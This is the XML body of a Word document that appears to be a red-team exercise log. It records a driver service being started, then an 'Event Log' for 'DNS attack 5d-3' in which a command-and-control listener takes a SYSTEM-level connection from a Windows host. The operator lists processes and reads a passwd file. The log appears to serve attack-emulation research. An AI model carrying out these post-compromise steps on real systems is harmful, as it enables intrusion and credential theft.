    <w:p w14:paraId="10C15167" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        TYPE               : 2  FILE_SYSTEM_DRIVER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635C85A0" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        STATE              : 1  STOPPED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7F4794" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        WIN32_EXIT_CODE    : 1077  (0x435)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E9EDA8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        SERVICE_EXIT_CODE  : 0  (0x0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294F074C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        CHECKPOINT         : 0x0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D7AA1A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        WAIT_HINT          : 0x0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A59555" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="765E8CA2" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>C:\WINDOWS\system32&gt;sc start filemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244609E1" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DF5CD4A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>SERVICE_NAME: filemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D14D79" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        TYPE               : 2  FILE_SYSTEM_DRIVER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9600A2" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        STATE              : 4  RUNNING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA33358" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F5B7C5" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        WIN32_EXIT_CODE    : 0  (0x0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E97E3B2" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        SERVICE_EXIT_CODE  : 0  (0x0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3407096B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        CHECKPOINT         : 0x0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D011AFA" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        WAIT_HINT          : 0x0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7498C5" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        PID                : 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A15C75C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        FLAGS              :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46820D22" w14:textId="1A29D922" w:rsidR="00A351B2" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E02E6A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="230" w:name="_Toc12600128"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="230"/>
    </w:p>
    <w:p w14:paraId="44616456" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>DNS attack 5d-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67530A30" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77BAB032" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>12:47</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5006696C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.167:8641/config.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2107266F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Xx--ls8h.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5A2DC4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>938527054</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609A8FF1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Visit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2491054B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A84C192" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>12:48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0202E824" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:/e5/backup/20190506/projects/drakon-apt/oc2$ python ocMain.py --http 8640</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44906859" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Must install flask to use snuggly, ignoring...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FFEBCF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>projects/build_drakon.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F064DFF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Default interface: 0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEB1BC3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Listening for connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4994BF70" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            0.0.0.0:8640  [HTTP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A80FCFC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71762C75" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D946755" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## New connection received ##################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214D1833" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] [windows] [x64] [N/A] [N/A]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A61AB8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Initializing new windows console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705BD58A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## NEW CONSOLE READY [W1] ####################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1C0107" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6360209D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D01447" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        W1        128.55.12.109:49907 --&gt;   128.55.12.167:8640  [HTTP]  Fri May 17 12:48:04 2019        active 43s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA6E18D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con W1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2327BE82" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C4445D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ta1-fivedirections-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727F7408" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E93455A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D85DA6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="118D5584" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>12:50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761662DF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DBEE83" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] pid                                                                  process                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3759E7D7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*]  0                                                                  &lt;unknown&gt;                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1FEB31" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*]  4                                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568E603C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 348                                             \Device\HarddiskVolume2\Windows\System32\smss.exe                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0EC8CC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 444                                             \Device\HarddiskVolume2\Windows\System32\csrss.exe                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6539FC45" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 520                                            \Device\HarddiskVolume2\Windows\System32\wininit.exe                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8FCBD0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 636                                           \Device\HarddiskVolume2\Windows\System32\services.exe                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338AE838" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 660                                             \Device\HarddiskVolume2\Windows\System32\lsass.exe                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FB7758" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 768                                            \Device\HarddiskVolume2\Windows\System32\svchost.exe                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341E645B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 784                                          \Device\HarddiskVolume2\Windows\System32\fontdrvhost.exe                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFCB46E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 852                                            \Device\HarddiskVolume2\Windows\System32\svchost.exe                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A28A5F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 892                                            \Device\HarddiskVolume2\Windows\System32\svchost.exe                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A33102" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 944                                            \Device\HarddiskVolume2\Windows\System32\svchost.exe                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9BF30B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 1008                                           \Device\HarddiskVolume2\Windows\System32\svchost.exe                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC7B441" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 540                                            \Device\HarddiskVolume2\Windows\System32\svchost.exe                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775AF17C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 1084                                           \Device\HarddiskVolume2\Windows\System32\svchost.exe                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EF1403" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 1108                                           \Device\HarddiskVolume2\Windows\System32\svchost.exe                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDF9B91" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 1132                                           \Device\HarddiskVolume2\Windows\System32\svchost.exe                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395FF9D8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 1236                                           \Device\HarddiskVolume2\Windows\System32\svchost.exe           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3200AA16" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E89E6EE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>12:50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6D299A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E1DD6C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F86867" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>12:51</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CA0E09" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cat passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A894835" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] # $FreeBSD$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA40A65" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332FA92C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root:*:0:0:Charlie &amp;:/root:/bin/csh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4679C6B7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>toor:*:0:0:Bourne-again Superuser:/root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C92A21" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6862110C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>operator:*:2:5:System &amp;:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1534EA21" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A06B5A1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E729975" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7611A4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
